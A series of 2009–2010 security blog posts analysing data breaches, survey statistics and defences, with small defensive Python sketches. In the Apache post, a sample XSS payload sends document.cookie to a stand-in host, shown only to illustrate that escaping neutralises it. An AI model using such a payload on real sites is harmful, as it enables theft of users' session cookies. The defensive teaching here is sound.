22. May 2010 · Comments Off on Heartland settles with MasterCard for $41 million · Categories: Breaches, Legal · Tags: ,

DarkReading is reporting:

In a legal settlement over its 2008 security breach, Heartland Payment Systems has agreed to pay up to $41.4 million to MasterCard Worldwide and its card issuers to repay operational costs and fraud losses attributed to the breach.

The article does not state whether this is included in the $139 million they said they set aside in a recent SEC filing. Given that the filing was recent, I would think yes. As I posted earlier this month, $139 million is a far cry from the initial expected cost of $12 million.

17. April 2010 · Comments Off on Apache infrastructure breach analysis is a model of forthrightness and a learning experience · Categories: Breaches · Tags:

Last week, the Apache infrastructure team disclosed a breach of their issue tracking software in which an XSS exploit led to root access, which in turn led to compromised passwords. What makes it interesting is the level of detail they provided about the breach: which security policies worked, which did not, and what they are changing to reduce the risk of another such breach. No attempt at security by obscurity here. McAfee Labs did a nice blog post on it.
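The root-cause class here, cross-site scripting, has a well understood fix: escape user-supplied data before rendering it. A minimal Python sketch of the principle (a generic illustration, not the actual JIRA flaw or its patch):

```python
import html

def render_comment(user_input: str) -> str:
    # Unescaped output would let "<script>...</script>" execute in the
    # victim's browser; html.escape neutralizes the markup.
    return "<p>" + html.escape(user_input) + "</p>"

# A classic cookie-stealing payload comes out as inert text:
print(render_comment("<script>document.location='http://evil.example/'+document.cookie</script>"))
```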

Do you think the use of Apache is going to go up or down? IMHO, the breach will have no effect or might actually increase Apache usage. The reality is that all organizations have breaches regularly. Sharing detailed information like this helps us improve our security.

BTW, if your organization is not experiencing breaches, it's due to lack of visibility.

20. February 2010 · Comments Off on Top two attack vectors – remote access applications and third party connections · Categories: Breaches, Research · Tags: , ,

Trustwave's recently published 2010 Global Security Report shows that the two attack vectors resulting in breaches most often are, by far, Remote Access Applications and Third Party Connections. Here is the list of the top five:

  • >95% Remote Access Application
  • >90% Third Party Connection
  • >15% SQL Injection
  • >10% Exposed Services
  • <5% Remote File Inclusion

Since the percentages total well over 100%, clearly many of the breaches they investigated involved more than one attack vector. It's also important to note that 98% of their investigations were of payment card data breaches. No surprise, since Trustwave is focused primarily on PCI compliance. The report does not indicate what percentage of the breaches occurred at organizations for which Trustwave was the QSA.

Regardless of these caveats, I believe it is worthwhile to note the total dominance of Remote Access Applications and Third Party Connections.

It is imperative that organizations upgrade their firewalls to provide network segmentation (zoning) and to recognize and control the use of most major application categories, including Remote Access Applications.
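To make that concrete, here is a toy model of a zone-based, application-aware policy with a default-deny stance. It is purely illustrative; the zone names and application categories are hypothetical, and real firewalls implement this in the dataplane, not in Python:

```python
# Toy model: segmentation between zones plus control by application category.
POLICY = {
    # (from_zone, to_zone, app_category): action
    ("internet", "cardholder-data", "remote-access"): "deny",
    ("partner",  "cardholder-data", "file-transfer"): "deny",
    ("app-tier", "cardholder-data", "database"):      "allow",
}

def evaluate(from_zone: str, to_zone: str, app_category: str) -> str:
    # Anything not explicitly allowed is denied (default deny).
    return POLICY.get((from_zone, to_zone, app_category), "deny")

print(evaluate("internet", "cardholder-data", "remote-access"))  # deny
print(evaluate("app-tier", "cardholder-data", "database"))       # allow
```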

Unfortunately you will have to register here to get the full report.

10. February 2010 · Comments Off on Insiders abuse poor database account provisioning and lack of database activity monitoring · Categories: Breaches, Database Activity Monitoring, Log Management, Security Information and Event Management (SIEM) · Tags: , ,

DarkReading published a good article about breaches caused by malicious insiders who get direct access to databases because account provisioning is poor and there is little or no database activity monitoring.

There are lots of choices out there for database activity monitoring but only three methods, which I wrote about here. I wrote about why database security lags behind network and end-point security here.
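As an illustration of what database activity monitoring can catch, here is a toy sketch of one common rule: alert when a service account that should only ever connect from application servers logs in from somewhere else. The account names and addresses are hypothetical:

```python
from typing import Optional

# Hypothetical provisioning data: service accounts and the only hosts
# that are supposed to use them.
APP_ACCOUNTS = {"crm_app", "billing_app"}
APP_SERVERS = {"10.0.1.10", "10.0.1.11"}

def check_session(account: str, client_ip: str, client_tool: str) -> Optional[str]:
    """Flag a service account connecting from an unexpected host."""
    if account in APP_ACCOUNTS and client_ip not in APP_SERVERS:
        return (f"ALERT: service account '{account}' used from "
                f"{client_ip} via {client_tool}")
    return None

# An insider running a SQL client with an application's credentials:
print(check_session("billing_app", "192.168.5.77", "sqlplus"))
```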

Wired Magazine reported this week that Wal-Mart kept secret a breach it discovered in November 2006 that had been ongoing for 17 months. According to the article, Wal-Mart claimed there was no reason to disclose the exploit at the time because it believed no customer data or credit card information was breached.

They are admitting that custom-developed point-of-sale software was breached. The California breach law covering breached financial information of California residents had gone into effect on July 1, 2003, and was extended to health information on January 1, 2009. I blogged about that here.

I think it would be more accurate to say that the forensics analysts hired by Wal-Mart could not "prove" customer data was breached, i.e., they could not find specific evidence of it. One key piece of information the article revealed: "The company’s server logs recorded only unsuccessful log-in attempts, not successful ones, frustrating a detailed analysis."

Based on my background in log management, I understand the approach of collecting only "bad" events like failed log-ins. Other than this one sentence, the article does not discuss what types of events were and were not collected. Therefore they had very little idea of what was really going on.
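For contrast, here is a minimal sketch, my own illustration rather than anything Wal-Mart ran, of an audit logger that records both outcomes, which is what lets a later investigation reconstruct what a compromised account actually did:

```python
import logging

# Record every authentication event, successful or not, in an audit log.
audit_log = logging.getLogger("auth.audit")
handler = logging.FileHandler("auth_audit.log")
handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
audit_log.addHandler(handler)
audit_log.setLevel(logging.INFO)

def record_login(username: str, source_ip: str, success: bool) -> None:
    outcome = "SUCCESS" if success else "FAILURE"
    # Logging only failures leaves no trail of what an attacker did after
    # getting in; logging successes closes that gap.
    audit_log.info("login outcome=%s user=%s src=%s", outcome, username, source_ip)

record_login("pos_admin", "10.2.3.4", True)
```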

The problem Wal-Mart faced at the time was that the cost of collecting and storing all the logs in an accessible manner was prohibitive. Fortunately, log data management software has improved and hardware costs have dropped dramatically. In addition, there are new tools for user activity monitoring.

However, my key reaction to this article is disappointment that Wal-Mart chose to keep this incident secret. News of a Wal-Mart breach might have motivated other retailers to strengthen their security defenses and increase their vigilance, which might have reduced the number of breaches that have occurred since 2006. It might also have increased the rigor QSAs applied to PCI DSS audits sooner.

In closing, I would like to call attention to Adam Shostack and Andrew Stewart's book, "The New School of Information Security," and quote a passage from page 78 that talks about the value of disclosing breaches aside from the need to inform people whose personal financial or health information may have been breached:

"Breach data is bringing us more and better objective data than any past information-sharing initiative in the field of information security. Breach data allows us to see more about the state of computer security than we've been able to with traditional sources of information. … Crucially, breach data allows us to understand what sorts of issues lead to real problems, and this can help us all make better security decisions."

04. October 2009 · Comments Off on Canadian study reports breaches triple in 2009. Is this a valid statistic? · Categories: Breaches, Security Management · Tags: , , , ,

Earlier this week, Telus released the results of its 2009 study of Canadian IT security practices, conducted jointly with the Rotman School of Management at the University of Toronto, which claimed that the number of breaches tripled to an average of 11.3. Here is the press release. But are these valid claims?

First, let's take a deeper look at the average of 11.3. If you simply average the raw answers to the 2009 question about the number of breaches during the last 12 months, the mean is indeed 11.3. However, let's take a closer look at the actual responses:

Number of Breaches    Percentage of Organizations
0                     14%
1                      6%
2 to 5                33%
6 to 10                9%
11 to 25               7%
26 to 50               3%
51 to 100              2%
More than 100          2%
Don't know            23%

Given the outliers at the high end, the average (mean) is not really a meaningful number; a handful of organizations reporting very large counts skew it upward. The modal response, 2 to 5 breaches, is much more representative.
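A quick back-of-the-envelope calculation shows just how much those few big buckets drive the headline number. The bucket midpoints below are my assumption (including 150 for "more than 100"), and the "don't know" responses are excluded:

```python
# Recompute a weighted mean from the published buckets.
buckets = [  # (assumed midpoint, share of respondents)
    (0, 0.14), (1, 0.06), (3.5, 0.33), (8, 0.09),
    (18, 0.07), (38, 0.03), (75.5, 0.02), (150, 0.02),
]
answered = sum(share for _, share in buckets)  # 0.76 after dropping "don't know"
mean = sum(mid * share for mid, share in buckets) / answered
print(f"weighted mean = {mean:.1f}")  # about 11.6, close to the reported 11.3

# The two largest buckets hold only 4% of respondents yet contribute about
# half of the mean:
top = (75.5 * 0.02 + 150 * 0.02) / answered
print(f"top 4% contribute = {top:.1f}")  # about 5.9 of the 11.6
```

In other words, roughly 4% of respondents account for about half of the 11.3 average.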

Also, there is no attempt to correlate the number of breaches an organization suffered with the organization's size. Of the 500 organizations participating, 31% had under 100 employees and 23% had over 10,000 employees. The point here is that the outliers may very well be a small group of very large organizations.

Now let's address the claim of "tripling." What could account for this huge increase?

  1. It may just be a case of people being more honest this year, i.e. reporting more breaches. After all, this is just a survey.
  2. It may be that organizations actually have better security controls in place and therefore detected more breaches.
  3. It may be a function of the organizations participating. In 2008, there were only 297 participants versus 500 in 2009.
  4. It could be the change in the way the question was worded in 2009 versus 2008. Here is the question from 2008 (in fact, the only place the study uses real numbers rather than percentages):

Q40. A major IT security incident can be defined as one which causes a disruption to normal activities such that significant time, resources, and/or payments are required to resolve the situation. Based on this definition, how many major security incidents do you estimate your organization has experienced in the last 12 months?

1 to 5          63%
6 to 10          2%
More than 10     1%
Don't know      24%

The 2009 study question:

Q48. How many Security breaches do you estimate your organization has experienced in the past 12 months?

I provided the responses earlier in this post. The point is that in 2008, the question specifically asked about major incidents while in 2009 the question was about all breaches.

Also note that in both cases the organizations were asked for "estimates." Don't most of these organizations have Security Incident Response Teams? At least the 69% with over 100 full-time employees? Wouldn't they know exactly how many "incidents" they investigated and how many were actual breaches?

I suppose studies like these, based on surveys, have some value, but we really need information based on facts and analysis based on sound techniques.

21. September 2009 · Comments Off on London Times Online report on Clampi thin on facts · Categories: Breaches, Funds Transfer Fraud, Malware · Tags: , , ,

The London-based Times Online ran a story today entitled "New Trojan virus poses online banking threat." With all due respect to Mike Harvey, their Technology Correspondent, the story appears to have gotten a few things wrong:

  • The headline refers to the Clampi Trojan, which is not new. It was first discovered in 2006 according to McAfee, and in 2008 according to Symantec. In fact, as late as July 23rd, Symantec classified Clampi as a "Very Low" risk. Since then, Symantec has raised the risk level to "High."
  • The Clampi Trojan is just one of many trojans that cyber criminals are using to steal people's online banking credentials. What these trojans have in common is keylogging capability, i.e. the ability to capture all of your keystrokes.
  • The real story is that sophisticated cyber criminals are focusing on stealing money directly out of small and medium business accounts.

For more details on Clampi and funds transfer fraud, see my earlier blog posts here and here respectively.

14. September 2009 · Comments Off on Two more high profile Web 2.0 exploits – NY Times, RBS Worldpay · Categories: Breaches, IT Security 2.0, Malware, Secure Browsing · Tags: , , , , , , , , ,

Two more high profile organizations have succumbed to Web 2.0-based exploits: the New York Times and RBS Worldpay. These incidents highlight the shortcomings of traditional IT security. I have no doubt that both organizations had deployed traditional firewalls and other IT security tools, yet they were still breached by well understood exploit methods for which there are proven mitigation tools.

I discussed this issue, Web 2.0 requires IT Security 2.0, at some length recently.

The current RBS Worldpay problem was merely a hacker showing off a SQL injection vulnerability in RBS Worldpay's payment processing system. Late last year RBS Worldpay suffered a more damaging breach involving the "personal and financial account information of about 1.5 million cardholders and other individuals, and the social security numbers (SSNs) of 1.1 million people."
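The standard mitigation for SQL injection is parameterized queries. A minimal Python sketch using sqlite3, with a purely hypothetical table:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE cardholders (id INTEGER, name TEXT)")

def find_cardholder(name: str):
    # Vulnerable pattern: building the query by string concatenation lets
    # input rewrite the SQL, e.g. "... WHERE name = '" + name + "'".
    # Safe pattern: the driver binds the value; it is never parsed as SQL.
    return conn.execute(
        "SELECT id, name FROM cardholders WHERE name = ?", (name,)
    ).fetchall()

# Classic injection input is treated as a literal string and matches nothing:
print(find_cardholder("x' OR '1'='1"))
```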

The New York Times website itself was not breached. Rather, a third party ad network vendor they use was serving "scareware" ads on the New York Times site. Martin McKeay points out on his blog:

"it appears that the code wasn’t directly on a NYT server, rather it was
served up by one of the third-party services that provide ads for the
NYT.  Once again, it shows that even if you trust a particular site
you’re visiting, the interaction between that site and the secondary
systems supporting it offer a great attack vector for the bad guys to
gain access through."

On the other hand, the average user coming to the New York Times site is not aware of this detail and will, quite deservedly, hold the New York Times responsible. Web sites that use third party ad networks to make money must take responsibility for exploits on those ad networks. For now, as usual, end users have to protect themselves.

I recommend that Firefox 3.5 users avail themselves of Adblock Plus and NoScript. Adblock Plus obviously blocks ads, and NoScript by default prevents JavaScript from running.

What's particularly interesting about NoScript is that you can allow the JavaScript associated with the site itself to run while still blocking the JavaScript associated with third party sites like advertising networks. Based on my reading of Troy Davis's analysis of the exploit, if you were using Firefox 3.5 and running NoScript with only New York Times JavaScript allowed, you would not have seen the scareware ad.
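To illustrate the idea, here is a simplified model of a per-site script whitelist; this is my sketch of the concept, not NoScript's actual code:

```python
from urllib.parse import urlparse

# Hypothetical whitelist: domains whose scripts the user has chosen to allow.
TRUSTED = {"nytimes.com"}

def script_allowed(script_url: str) -> bool:
    host = urlparse(script_url).hostname or ""
    # Allow a script only if its host is, or is a subdomain of, a trusted domain.
    return any(host == d or host.endswith("." + d) for d in TRUSTED)

print(script_allowed("https://graphics8.nytimes.com/page.js"))       # True
print(script_allowed("https://ads.example-adnetwork.com/serve.js"))  # False
```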